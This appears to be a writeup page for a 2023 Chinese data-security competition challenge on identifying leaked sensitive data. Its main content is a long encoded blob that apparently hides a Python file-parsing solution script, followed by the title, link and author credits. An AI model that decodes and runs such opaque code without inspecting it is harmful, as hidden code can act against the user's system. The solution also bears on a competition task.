xLKEuJ2McoTIhLJ1yKIfaMTS0LFqqJ2yqJ2yhMTI4KFjtnKEyoF5fo3qypvtcXI0tCFOcPvNtVPNtVPNtVPNtVTEuqTSoMzyfMJ5uoJIqJ2LapS97nKEyoF5fo3qypvtcsFqqVQ0tK2DhL29jrFtcPvNtVPOyoTyzVUE5pTHtCG0tW2kcozHaBtbtVPNtVPNtVTuyLJEypvN9VSfapTuiozHaYPNaL2IlqS9holpfVPqmL2uio2jaYPNaMJ1unJjaYPNaLzShn19wLKWxW10XVPNtVPNtVPOsMTS0LFN9VSgqPvNtVPNtVPNtVlOwo250MJ50VQ0tpzHhMzyhMTSfoPtaXPjbJ1k1ATHjZP1pqGyzLGIqXm8cYPy8XPjbJ15pqGEyZQNgKUH5MzR1KFgpMPxfClxaYPOwo250MJ50XDbtVPNtVPNtVTAioaEyoaDtCFOwo250MJ50YaAjoTy0XPpfWlxXVPNtVPNtVPOzo3VtnKEyoFOcovOwo250MJ50BtbtVPNtVPNtVPNtVPOsMPN9VSfarTIhoaxaKFb1PvNtVPNtVPNtVPNtVNbtVPNtVPNtVPNtVPO2YUE5pTHtCFOjLKWmMI9cqTIgXTy0MJ0cPvNtVPNtVPNtVPNtVNbtVPNtVPNtVPNtVPOcMvO2VTymVT5iqPOBo25yBtbtVPNtVPNtVPNtVPNtVPNtK2EonTIuMTIlYzyhMTI4XUE5pTHcKFN9VULXVPNtVPNtVPNtVPNtVPNtVS9xLKEuYzSjpTIhMPusMPxXVPNtVPNtVPNXVPNtVPNtVPOxLKEuJ2McoTIhLJ1yKIfaoJI0LFqqJlqbMJSxMKVaKFN9VTuyLJEypv5wo3O5XPxXVPNtVPNtVPOxLKEuJ2McoTIhLJ1yKIfaoJI0LFqqJlqfMJ5aqTtaKFN9VTkyovusMTS0LFxXVPNtVPNtVPOxLKEuJ2McoTIhLJ1yKIfaMTS0LFqqVQ0tK2EuqTRhL29jrFtcPtbtVPNtVPNtVTMipvOcozEyrPjtnKEyoFOcovOyoaIgMKWuqTHbMTS0LIgznJkyozSgMI1oW21yqTRaKIfanTIuMTIlW10cBtbtVPNtVPNtVPNtVPOsMPN9VUg9PvNtVPNtVPNtVPNtVTMipvOcVTyhVUWuozqyXTEuqTSoMzyfMJ5uoJIqJlqgMKEuW11oW2kyozq0nPqqXGbXVPNtVPNtVPNtVPNtVPNtVTyzVTEuqTSoMzyfMJ5uoJIqJlqxLKEuW11onI1onJ5xMKuqVPR9VPq4MJ5hrFp6PvNtVPNtVPNtVPNtVPNtVPNtVPNtK2EoMz9loJS0K3MupvuxLKEuJ2McoTIhLJ1yKIfaMTS0LFqqJ2yqJ2yhMTI4KFjtnKEyoF5fo3qypvtcXI0tCFOcPvNtVPNtVPNtVPNtVTEuqTSoMzyfMJ5uoJIqJ2LapS97nKEyoF5fo3qypvtcsFqqVQ0tK2DhL29jrFtcPtcxMJLtoTIun3qipzgsMz9lK3E4qPujLKEbYPOznJkyozSgMFx6PvNtVPOaoT9vLJjtpzImqJk0PvNtVPO3nKEbVT9jMJ4bpTS0nPjtMJ5wo2Ecozp9W3I0Mv04WlxtLKZtMwbXVPNtVPNtVPOfnJ5yplN9VTLhpzIuMTkcozImXPxXVPNtVNbtVPNtL29hqTIhqPk0rKOyVQ0tpTSlp2IsL29hqTIhqPufnJ5yplxXPvNtVPOcMvO0rKOyVQ09VPq0LJWfMFp6PvNtVPNtVPNtMz9lVTy0MJ0tnJ4tL29hqTIhqSfanTIuMTIlW106PvNtVPNtVPNtVPNtVTyzVTy0MJ0hoT93MKVbXFOcovO2LKWcLaZ6PvNtVPNtVPNtVPNtVPNtVPOzo3VtqvOcovOwo250MJ50JlqxLKEuW106PvNtVPNtVPNtVPNtVPNtVPNtVPNtpzImVQ0toT9wLKEyK2McoTHbqygwo250MJ50JlqbMJSxMKVaKF5cozEyrPucqTIgYzkiq2IlXPxcKFjtnKEyoF5fo3qypvtcXDbtVPNtVPNtVPNtVPNtVPNtVPNtVTyzVUWyplOcplOho3DtGz9hMGbXVPNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVlOjpzyhqPulMKZcPvNtVPNtVPNtVPNtVPNtVPNtVPNtVPNtVUWyp3IfqP5upUOyozDbWlNaYzcinJ4bXTMcoTIhLJ1yYPxepzImXFNeVPqpovpcPvNtVPOyoTyzVUE5pTHtCG0tW2cmo24aBtbtVPNtVPNtVTMipvOfnJ5yVTyhVTAioaEyoaD6PvNtVPNtVPNtVPNtVTMipvOeVTyhVTkcozH6PvNtVPNtVPNtVPNtVPNtVPOcMvOeYzkiq2IlXPxtnJ4tqzSlnJW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
2023 数字中国创新大赛网络数据安全产业人才挑战赛 数据安全 数据分析 敏感数据泄露识别 Writeup
https://www.wd-ljt.com/post/0404/984.html
来源于问谛居,转载记得联系作者哟~
叶汐白
虾哥哥